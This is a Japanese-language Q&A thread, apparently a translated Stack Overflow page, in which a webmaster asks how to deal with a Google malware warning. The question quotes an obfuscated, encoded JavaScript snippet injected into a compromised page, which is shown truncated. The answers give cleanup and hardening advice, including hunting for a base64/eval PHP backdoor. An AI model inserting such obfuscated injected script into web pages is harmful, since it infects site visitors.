0

昨日、自分のサイトの 1 つにアクセスしたときに、サイトにマルウェアがあるという警告を Google から受け取りました。私はコードを見て、確かにそこにあるべきではないいくつかのJavaScriptがありました。私はそれをグーグルで検索しましたが、有用なものは何も見つかりませんでした。サイトに戻ったとき、そのコードは消えていましたが、Google (検索エンジンからサイトにアクセスするとき) と Google Chrome は、サイトにマルウェアがあるという警告を表示します。

ウェブマスター ツールを調べたところ、問題のあるページはほとんど見つかりませんでした。それらの 1 つがhttp://www.keramikfliesen.com/schweiz/rimini/です。ウェブマスター ツールのマルウェアの下に表示されるコードは次のとおりです。

<script type='text/javascript'>st="no3nen0orno3pno3rxstxpno3
rxnl";Date&&(a=["a#%d]%b@%e_%c)%1<%5*%4+%9:%3^%2","%7!%0|%f~
%8?%6&"]);var b=[],c="&!^<^]$$&)&~&_&)!:$$^@$|&:&&$?$]^<^]^]
&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*$_&:&_&+&*!?+~&&$?&!^<$:$:!@!?
^+^]^!^$+*^&^@!&&<!$$|&^^]&_&*!!$|++&<!+&*^@&^$_!^&*!+*+&:&]
&*$?&^$_&!&*!+*+&:&]&*$?$:$:^@&*&+^]&_&*!!$|++&<!+&*$?&^$_&!
&*!+*+&:&]&*$?$:$@!?^+$:^@&+&~&^!*&]&*&_!+$_&^&~&~&@&:&*^]&!
^<$@$$^]$$$@&*!^&^&<!|&*$?&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$:
$@$$^@&*!?!|&:!$&*!^^]$$$@&*&+$_!+&~+!+]*+*^!+!$&:&_&!$?$:$@
$$^@!|&<!+&?^]$~$$^@&!^^^]$$&?!+!+!|^#$~$~$$$@!^!+$_!$&*!|&)
&<&^&*$?$~&*&_^|$~&!$)$$&!$$$:$_!$&*!|&)&<&^&*$?$~&_&~^^$~&!
$)$$&*$$$:$_!$&*!|&)&<&^&*$?$~!|&*!$!?$~&!$)$$$_$$$:$@$$$~!+
&~!|^$$_&?!+&]&)$$^@!&&<!$$|&+^]$]^<$<^]&_&<!&&:&!&<!+&~!$$_
!*!^&*!$+<&!&*&_!+$_!+&~+)&~!!&*!$+^&<!^&*$?$:$_&:&_&+&*!?+~
&&$?$$&&&:!$&*&&&~!?$$$:$)&*^]$$^<$$$)&?^]&&!*&_&^!+&:&~&_$?
$:!@!]^@&?$_!|!$&~!+&~!+!:!|&*^]!@&$^#&&!*&_&^!+&:&~&_$?$:!@
!$&*!+!*!$&_$|&!^^!]$)&<^#&&!*&_&^!+&:&~&_$?$:!@!&&<!$$|&&^]
&+&~

助けてもらえますか?これどう戦えばいいの?

事前にお世話になりました皆様、誠にありがとうございました!

4

3 に答える 3

2


  • Web ページからマルウェアを削除します。
  • すぐにパスワードを変更してください。
  • また、XSS (クロスサイト スクリプティング) およびSQL インジェクションの脆弱性がないか確認してください。
  • 高ランクでない、または評判の良いソースからのプラグインを無効にします。
  • 安全なプロトコルを使用してください。StopBadware.org のWeb サイトのクリーニングと保護に関するヒント を確認してください。
  • ログファイルに注意してください。
  • 最新のソフトウェア更新とパッチで最新の状態を保ちます。

    それが役に立てば幸い!
于 2012-05-30T07:37:41.297 に答える
1

コードが再び表示された場合、攻撃者はスクリプトを残し、要求に応じて感染手順を実行します。通常、このスクリプトは、マルウェア コードのエンコードされた文字列 (例: base64) を受け取り、それをデコードして、 経由で実行しeval()ます。このファイル (PHP スクリプトである可能性が最も高い) を見つけて、削除する必要があります。それを見つけるには、ログを見て疑わしいリクエストを探します (たとえば、単一のPOSTリクエスト、文字列の送信base64は非常に疑わしいリクエストです)。

于 2012-07-27T14:17:38.853 に答える
0

ほとんどの場合、ホスティングは自動化されたツールによって侵害されました (パスワードが盗まれました)。このツールは通常、ページにアクセスしたユーザーにマルウェアを感染させるために、js ファイル内に JavaScript を挿入します。あなたがすべき :

  1. パスワードを変更します。
  2. 侵害されていない最新のバックアップを復元します。
于 2012-05-30T07:37:02.740 に答える